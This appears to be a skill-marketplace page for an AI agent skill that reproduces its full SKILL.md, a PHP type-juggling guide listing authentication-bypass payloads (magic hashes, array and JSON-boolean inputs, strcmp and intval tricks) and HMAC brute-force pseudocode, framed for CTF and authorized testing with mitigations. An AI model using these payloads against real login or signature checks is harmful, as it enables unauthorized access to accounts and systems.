Agent skill

Type Juggling

by langbyyi in langbyyi/CyberStrikeAI-SRC

PHP type juggling and weak comparison (==) bypass. An agent skill from langbyyi/CyberStrikeAI-SRC.

Apache-2.0Auto-check passedSecurity

Install Type Juggling

skills CLI
$ npx skills add langbyyi/CyberStrikeAI-SRC --skill type-juggling -a claude-code

Project install by default; add -g for ~/.claude/skills/.

GitHub CLI
$ gh skill install langbyyi/CyberStrikeAI-SRC type-juggling --agent claude-code

Project scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).

Manual copy
$ git clone --depth 1 https://github.com/langbyyi/CyberStrikeAI-SRC.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/type-juggling .claude/skills/type-juggling && rm -rf skills-src

Use ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.

Claude Code skills documentation · loads skills from .claude/skills/

Facts

Skill name
type-juggling
GitHub stars
134
Used in
1 other repo
Token cost
~2.9k tokens
SKILL.md length
895 words
Files
1
Skills in repo
13
Repo updated
First seen
Licence
Apache-2.0

At a glance

PHP type juggling and weak comparison (==) bypass. An agent skill from langbyyi/CyberStrikeAI-SRC.

  • Works in 7 steps: QUICK START → LOOSE COMPARISON (==) — TRUTH TABLE &… → MAGIC HASHES (0e… + digits only) → …
  • HMAC/signature checks
  • SKILL.md covers 0. QUICK START, 1. LOOSE COMPARISON (==) —…, 2. MAGIC HASHES (0e… + digits… and 3. HMAC BYPASS (LOOSE COMPARE…, plus 4 more sections
  • Calls php

What it does

Type Juggling is an agent skill from langbyyi/CyberStrikeAI-SRC. PHP type juggling and weak comparison (==) bypass. Use when authentication, HMAC/signature checks, or token validation uses loose equality, numeric coercion, or hash comparisons without strict types — common in legacy PHP and CTF-style code paths.

Its SKILL.md is about 2.9k tokens, which your agent loads only when the skill is triggered. It is a single SKILL.md file with no bundled scripts.

It sits in Security, covering Capture the flag. It works with PHP. The licence is Apache-2.0.

When your agent uses it

  • HMAC/signature checks
  • Token validation uses loose equality
  • Numeric coercion
  • Hash comparisons without strict types — common in legacy PHP and CTF-style code paths

Example prompts

  • “/type-juggling”

Workflow steps

7 steps, taken from the step headings in SKILL.md.

  1. QUICK START
  2. LOOSE COMPARISON (==) — TRUTH TABLE & VERSIONS
  3. MAGIC HASHES (0e… + digits only)
  4. HMAC BYPASS (LOOSE COMPARE VS "0" OR 0)
  5. NULL JUGGLING (ARRAYS & TYPE ERRORS)
  6. CTF PATTERNS
  7. DECISION TREE

What it can do on your machine

Read from SKILL.md and the folder at commit 166ee1c. It shows what the files ask for, not the result of running them.

  • Tool permissions

    Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.

    From allowed-tools in the SKILL.md frontmatter.

  • Runs code

    Shell commands in SKILL.md call:

    • php

    From the folder's file list and the shell code blocks in SKILL.md.

  • Network

    No URLs in SKILL.md.

    From URLs in SKILL.md, links to its own repository left out.

  • Credentials

    Names no API keys, tokens, secrets or passwords.

    From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.

Context cost

Type Juggling loads about 2.9k tokens when it runs. Until then it costs about 66 tokens; SKILL.md has 895 words of instructions outside code blocks.

Always · name and description, kept in context so the agent knows when to use it
~66
When it runs · the whole SKILL.md, loaded when a task matches
~2.9k

Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.

Safety

Auto-check passed

The automated check found no risky patterns in SKILL.md.

Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.

SKILL.md

The full file from langbyyi/CyberStrikeAI-SRC at commit 166ee1c, republished under its Apache-2.0 licence (© langbyyi). 895 words, ~2,943 tokens.

Download SKILL.mdSave it as .claude/skills/type-juggling/SKILL.md (or your agent's skills folder).
name
type-juggling
description
PHP type juggling and weak comparison (`==`) bypass. Use when authentication, HMAC/signature checks, or token validation uses loose equality, numeric coercion, or hash comparisons without strict types — common in legacy PHP and CTF-style code paths.

SKILL: PHP Type Juggling — Weak Comparison & Magic Hash Bypass

AI LOAD INSTRUCTION: PHP == coercion, magic hashes (0e…), HMAC/hash loose checks, NULL from bad types, and CTF-style strcmp / json_decode / intval tricks. Use strict routing: map the sink (== vs hash_equals), PHP major version, and whether both operands are attacker-controlled. 中文路由:遇到 PHP 登录/签名/md5($_GET['x'])==md5($_GET['y']) 类题目或代码,优先读本 skill;若已用 hash_equals/=== 则本路径通常不成立。

0. QUICK START

First-pass goal: prove the server branch treats unequal secrets/tokens as equal via coercion, not guess the real password.

First-pass payloads (auth / token shape)
text
password[]=x
password=
0
0e12345
240610708
QNKCDZO
true
[]
{"password":true}
admin%00
Minimal PHP probes (local or php -r in lab)
php
<?php
// Loose compare probes — run in target PHP major version if possible
var_dump('0e123' == '0e999');
var_dump('123a' == 123);
var_dump(md5('240610708') == md5('QNKCDZO'));
Routing hints
线索下一步
源码里出现 == 比较密码、token、HMAC 结果走 Section 1–3
md5($a) == md5($b) 或 sha1 松散比较Section 2 魔法哈希
hash_hmac(...) != '0' 或和 "0" 比较Section 3
strcmp、json_decode(..., true)、intvalSection 5

1. LOOSE COMPARISON (==) — TRUTH TABLE & VERSIONS

PHP compares operands with type juggling unless you use === or hash_equals() for secrets.

1.1 Core examples (strings vs numbers)
ExpressionResultMechanism (short)
'0010e2' == '1e3'trueBoth strings look numeric → compared as floats; both parse to 1000.0 (not zero — common exam trap; see next row for real “both zero”)
'0e462097431906509019562988736854' == '0e830400451993494058024219903391'trueBoth parse as 0.0 in scientific notation
'123a' == 123trueString cast to int stops at first non-digit → 123
'abc' == 0true (PHP 7.x and earlier)Non-numeric string compared to int → string becomes 0
'' == 0trueEmpty string → 0
'' == falsetrueboth “falsy” in loose rules
false == NULLtrueloose equality
0 == falsetrueloose equality
'' == 0 == false == NULLtrue (chain)Each adjacent pair is true under == (''==0, 0==false, false==NULL) — classic “falsy” chain
'0' == falsetrueString '0' is the only non-empty string that compares as false to boolean
'php' == 0false (PHP 8+)PHP 8: non-numeric string no longer equals 0
1.2 PHP 5 vs 7 vs 8 (high-signal deltas)
TopicPHP 5.x / 7.x (typical)PHP 8.0+
0 == "foo"true (string → 0)false
String-to-number for "123a"Still truncates for (int) / numeric compare in many == pathsSame idea for numeric strings; non-numeric vs int fixed as above
md5([]) / sha1([])May warn / NULL-like behavior in older patternsTypeError for wrong types — kills classic [] tricks unless error handling collapses to NULL

Tester takeaway: always note PHP version from headers, X-Powered-By, or fingerprint; a payload that works on PHP 7 may fail on PHP 8.

1.3 Safe alternative (defense / verification)
php
hash_equals((string)$expected, (string)$actual);  // timing-safe, strict string
// or
$expected === $actual;

2. MAGIC HASHES (0e… + digits only)

When both sides are hex-looking hash strings that match ^0e[0-9]+$, PHP treats them as floats in scientific notation → value 0.0. Then md5(A) == md5(B) is true even though digests differ as strings.

2.1 Reference table (MD5 / SHA-1 and longer algos)
AlgorithmExample inputDigest (starts with 0e + all decimal digits)
MD52406107080e462097431906509019562988736854
MD5QNKCDZO0e830400451993494058024219903391
SHA-1109324351120e07766915004133176347055865026311692244
SHA-224(brute-force / precomputed)Example form: 0e + decimal digits only → == with another such string is true
SHA-256(brute-force / precomputed)Same pattern: only strings matching ^0e\d+$ collide under ==

Why it works: md5('240610708') == md5('QNKCDZO') → both sides match ^0e[0-9]+$ → both interpreted as 0.0 == 0.0 → true.

2.2 Exploit pattern in code
php
if (md5($_GET['a']) == md5($_GET['b']) && $_GET['a'] != $_GET['b']) {
    // intended: different strings, same md5 (impossible for md5)
    // actual: two different strings whose *digests* are magic hashes
}
2.3 Payload sketch (pair hunting)
text
?a=240610708&b=QNKCDZO

For SHA-224/256, treat as search problem: brute-force inputs until digest matches ^0e\d+$; pair two distinct inputs. Longer hashes = harder; MD5/SHA1 examples above are the usual teaching set.


Show full SKILL.md (380 more words)Show less

3. HMAC BYPASS (LOOSE COMPARE VS "0" OR 0)

If logic uses loose inequality against a constant:

php
if (hash_hmac('md5', $data, $key) != '0') { /* ok */ }
// or == 0, == false with string "0e...", etc.

Brute-force $data (e.g. timestamp, nonce, counter) until hash_hmac output matches ^0e[0-9]+$ (for MD5 output) or the code’s specific loose rule — then the hash may compare equal to 0 or to another magic digest under ==.

Example (MD5-style 0e digest for a numeric message)
ConceptExample
Message typeUnix timestamp, incrementing id, millisecond clock
Timestamp brute-force patternTutorials sometimes cite 1539805986 → 0e772967136366835494939987377058 as a magic-hash style example; md5('1539805986') does not yield that digest in stock PHP — use the idea (scan timestamps / counters until output matches ^0e[0-9]+$) and always verify against the exact function + key in the target code.
GoalFind $data such that hash_hmac('md5', $data, $key) matches ^0e[0-9]+$
NoteWithout knowing $key, you may still brute $data if algorithm/output are visible in a oracle; CTFs often leak or fix key
text
# Conceptual: try many timestamps
for t in range(T0, T1):
    if re.fullmatch(r'0e\d+', hmac_md5(str(t), key)):
        use t

Mitigation: hash_equals($mac, $expected) + fixed-length hex/binary encoding; never compare HMAC to bare "0".


4. NULL JUGGLING (ARRAYS & TYPE ERRORS)

Invalid types can yield NULL on the compared side; loose equality to another NULL or coerced value may pass.

CallTypical PHP 7/8 behavior
md5([])PHP 8: TypeError; older: warnings / not reliable across versions
sha1([])Same
IdeaIf error handler or custom wrapper converts failures to NULL, then NULL == NULL or NULL == sha1("x") if other side is also NULL
php
// CTF / broken code mental model:
@sha1($_GET['x']) == @sha1($_GET['y']);  // if both error to NULL → true

Real audits: look for @, custom try/catch that sets hash to null, or user input passed where a string is required.


5. CTF PATTERNS

5.1 strcmp / strcasecmp with arrays
php
strcmp([], "password");  // NULL in PHP 7/8 (invalid args)
// NULL == 0  → true in loose compare if code does:
if (strcmp($_GET['p'], $secret) == 0)

Payload:

text
?p[]=1
5.2 intval bypass
php
// Hex: base 0 lets PHP interpret 0x prefix (version-dependent; always verify)
intval("0x1A", 0);   // → 26

// Octal: leading 0 can be parsed as octal with base 0
intval("010", 0);  // → 8 (classic teaching example; confirm on target PHP)

// Scientific notation: intval() alone stops at 'e'; cast via float first
intval((float) "1e2"); // → 100
text
?id=0x1A
?id=010
?id=1e2
5.3 json_decode + true for associative array auth
json
{"password": true}
php
$j = json_decode($input, true);
if ($j['password'] == $stored_string) // true == "nonempty" often true — see PHP loose rules
5.4 is_numeric + loose compare
php
is_numeric("0e12345");  // true
"0e12345" == 0;         // true (scientific notation → 0.0)
5.5 Deserialization + magic properties

Unserialize user input into objects whose __toString or properties feed into md5($obj) or loose compare — combine with magic hash strings on properties (CTF). Look for unserialize($_…) near == on hashes.


6. DECISION TREE

text
                         +------------------+
                         | PHP loose compare|
                         | or hash == hash? |
                         +--------+---------+
                                  |
                    +-------------+-------------+
                    |                           |
             +------v------+             +------v------+
             | Uses === or |             | Uses == or   |
             | hash_equals |             | strcmp == 0  |
             +------+------+             +------+-------+
                    |                           |
               STOP (likely)              +-----v-----+
                                          | Operand   |
                                          | types?    |
                                          +-----+-----+
                           +--------------+---+--------------+
                           |              |                  |
                    +------v------+ +-----v-----+    +-------v--------+
                    | Both numeric| | One int & |    | Hash digests   |
                    | strings 0e… | | one string|    | both 0e\d+ ?   |
                    +------+------+ +-----+-----+    +-------+--------+
                           |              |                  |
                      MAGIC HASH    STRING/INT           MAGIC HASH
                      COLLISION     JUGGLING             (md5/sha1/…)
                           |              |                  |
                           +------+-------+------------------+
                                  |
                           +------v------+
                           | HMAC / MAC  |
                           | vs "0"      |
                           +------+------+
                                  |
                           brute $data
                           for 0e… digest
                                  |
                           +------v------+
                           | Arrays /    |
                           | json true / |
                           | strcmp([])  |
                           +-------------+
Tool references
ToolUse
Local php CLIReproduce == behavior for target major version
Static code reviewGrep ==, != on crypto outputs; find missing hash_equals
CTF frameworksPayload generators for magic hashes and 0e search

Safety & scope: Use only on authorized targets (CTF, lab, written permission). This skill explains language semantics for defense and assessment — not a license to attack systems without consent.


© langbyyi, Apache-2.0. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file

Files

Just SKILL.md in skills/type-juggling of langbyyi/CyberStrikeAI-SRC.

Open the folder on GitHubat commit 166ee1c

Used in 1 other repository

We found 1 copy of this SKILL.md (exact, near-identical or edited) in other folders, from 1 other GitHub owner. This page covers the copy in langbyyi/CyberStrikeAI-SRC, which our catalogue first saw on October 7, 2026.

Compare with similar skills

Type Juggling next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.

Type Juggling compared with similar skills
SkillStarsUsed inTokensAuto-checkLicenceRepo updated
Type Juggling this skilllangbyyi/CyberStrikeAI-SRC1341 repos~2.9kAutomated safety check: PassApache-2.0
Ctf Source Auditwgpsec/AboutSecurity1.8k—~1.4kAutomated safety check: NotesNone
Ctf Flag Verificationwgpsec/AboutSecurity1.8k—~644Automated safety check: PassNone
Ctf Web Reconwgpsec/AboutSecurity1.8k—~624Automated safety check: NotesNone
Code Audit3stoneBrother/code-audit8931 repos~2.7kAutomated safety check: PassNone
Reverse Flowlingbol088-spec/reverse-flow-skill936—~2.4kAutomated safety check: PassMIT

Similar skills

  • Ctf Source Audit

    wgpsec/AboutSecurity

    CTF 挑战中的源码审计方法。当发现 .git 目录、.bak/.zip 备份、/proc/self/environ 泄露源码时使用。与真实代码审计不同——CTF 源码中的漏洞是故意设置的,通常只有 1-2 个关键点。先找危险函数(sink),再追溯输入(source)到该函数的路径。覆盖 PHP/Python/Node.js/Java 四种语言的危险函数和漏洞模式

    1.8k GitHub stars~1.4k tokensUpdated 4 days ago
    SecurityAuto-check: notes
  • Ctf Flag Verification

    wgpsec/AboutSecurity

    CTF/靶场 Flag 强制验证流程。当通过任何方式发现疑似 flag 字符串(含 flag{、FLAG{、ctf{ 等格式)时必须立即使用此 skill 验证,不要直接提交。防止因字符截断、编码错误、HTML 实体、base64 不完整解码、hex 截断等原因导致提交错误 flag。即使 flag 看起来完整,也可能存在隐藏字符或编码问题。覆盖 SQL…

    1.8k GitHub stars~644 tokensUpdated 4 days ago
    SecurityAuto-check passed
  • Ctf Web Recon

    wgpsec/AboutSecurity

    CTF Web 挑战专用侦察方法。当面对 CTF 靶场目标需要快速发现攻击入口时使用。与真实渗透的 recon 不同——CTF 是单个应用、有意留线索、侦察应在 2-3 轮内完成。覆盖源码泄露、备份文件、隐藏路径、页面线索提取

    1.8k GitHub stars~624 tokensUpdated 4 days ago
    SecurityAuto-check: notes
  • Code Audit

    3stoneBrother/code-audit

    Professional code security audit skill covering 55+ vulnerability types.

    893 GitHub starsUsed in 1 repo~2.7k tokens
    SecurityAuto-check passed
  • Reverse Flow

    lingbol088-spec/reverse-flow-skill

    Guided reverse engineering workflow for binaries, firmware, mobile apps, scripts, document samples, protocol captures, and unknown artifacts.

    936 GitHub stars~2.4k tokensUpdated 2 mo ago
    SecurityAuto-check passed
  • Audit Skills

    RuoJi6/audit-skills

    当用户要求审计 Java、.NET 或 PHP 源码/部署产物/反编译产物/安全发现,并需要默认脚本输出目录、报告输出目录、Java/.NET 反编译与反混淆参考、Java 组件 YAML 正则匹配扫描、确认漏洞判定标准、安全 Payload 和 BurpSuite 原始 HTTP 请求包证据时使用。仅用于授权代码审计和防御性安全验证。

    1k GitHub stars~447 tokensUpdated 3 mo ago
    SecurityAuto-check passed

More from langbyyi/CyberStrikeAI-SRC

All 13 skills in this repo
  • Burp MCP Vuln Check

    langbyyi/CyberStrikeAI-SRC

    Automate low-impact web vulnerability verification through Burp MCP.

    134 GitHub stars~3.1k tokensUpdated yesterday
    Auto-check passed
  • Authbypass Authentication Flaws

    langbyyi/CyberStrikeAI-SRC

    Authentication bypass testing playbook. An agent skill from langbyyi/CyberStrikeAI-SRC.

    134 GitHub starsUsed in 1 repo~3.9k tokens
    Auto-check passed
  • HTTP Parameter Pollution

    langbyyi/CyberStrikeAI-SRC

    HTTP Parameter Pollution (HPP): duplicate query/body keys parsed differently by servers, proxies, WAFs, and app frameworks.

    134 GitHub starsUsed in 1 repo~2.2k tokens
    Auto-check passed
  • Insecure Source Code Management

    langbyyi/CyberStrikeAI-SRC

    Source control and artifact exposure (.git, .svn, .hg, backups, .env).

    134 GitHub starsUsed in 1 repo~1.3k tokens
    Auto-check: notes
  • Websocket Security

    langbyyi/CyberStrikeAI-SRC

    WebSocket handshake, CSWSH, tooling (wsrepl, ws-harness, Burp), and common flaws.

    134 GitHub starsUsed in 1 repo~1.8k tokens
    Auto-check passed
  • Xslt Injection

    langbyyi/CyberStrikeAI-SRC

    XSLT injection testing: processor fingerprinting, XXE and document() SSRF, EXSLT write primitives, PHP/Java/.NET extension RCE surfaces.

    134 GitHub starsUsed in 1 repo~3k tokens
    Auto-check passed

Works with

Categories

Questions about Type Juggling

What does Type Juggling do?

PHP type juggling and weak comparison (==) bypass. An agent skill from langbyyi/CyberStrikeAI-SRC. Type Juggling is an agent skill from langbyyi/CyberStrikeAI-SRC. PHP type juggling and weak comparison (==) bypass.

When should I use Type Juggling?

Type Juggling fits situations like: HMAC/signature checks; token validation uses loose equality; numeric coercion; hash comparisons without strict types — common in legacy PHP and CTF-style code paths.

How do I install Type Juggling in Claude Code?

Run `npx skills add langbyyi/CyberStrikeAI-SRC --skill type-juggling -a claude-code`. Or copy the skill folder (skills/type-juggling in langbyyi/CyberStrikeAI-SRC) into .claude/skills/type-juggling in your project. Claude Code loads it when a task matches its description.

How do I install Type Juggling in Codex?

Run `npx skills add langbyyi/CyberStrikeAI-SRC --skill type-juggling -a codex`. Or copy the skill folder (skills/type-juggling in langbyyi/CyberStrikeAI-SRC) into .agents/skills/type-juggling in your project. Codex loads it when a task matches its description.

Can I use Type Juggling in Cursor, Gemini CLI or GitHub Copilot?

Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add langbyyi/CyberStrikeAI-SRC --skill type-juggling -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/type-juggling, .gemini/skills/type-juggling, .github/skills/type-juggling and .opencode/skills/type-juggling in your project.

What does Type Juggling need to run?

Going by SKILL.md and its folder, Type Juggling needs the command-line tools its instructions call (php).

Does Type Juggling access the network?

SKILL.md contains no URLs. Any network use would come from the scripts or tools the agent runs. This is read from the text; nothing was executed.

Is Type Juggling safe to install?

Our automated static check of SKILL.md found no risky patterns, such as piping downloads into a shell, reading credential files or hidden Unicode. It is not a guarantee. Review the folder before installing.

What licence does Type Juggling use?

Type Juggling is published under the Apache-2.0 licence (the repository's licence). It allows redistribution, so the full SKILL.md is shown on this page.

How many tokens does Type Juggling use?

About 2.9k tokens (SKILL.md is roughly 12k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full.

What are the alternatives to Type Juggling?

Skills that share tags, products or a category with Type Juggling: Ctf Source Audit (wgpsec/AboutSecurity, 1.8k stars), Ctf Flag Verification (wgpsec/AboutSecurity, 1.8k stars), Ctf Web Recon (wgpsec/AboutSecurity, 1.8k stars) and Code Audit (3stoneBrother/code-audit, 893 stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.

Who maintains Type Juggling?

langbyyi (a GitHub user) maintains it in langbyyi/CyberStrikeAI-SRC, which has 134 GitHub stars. The repository holds 13 skills in this directory. The repository was last updated on October 7, 2026.

Source: langbyyi/CyberStrikeAI-SRC on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.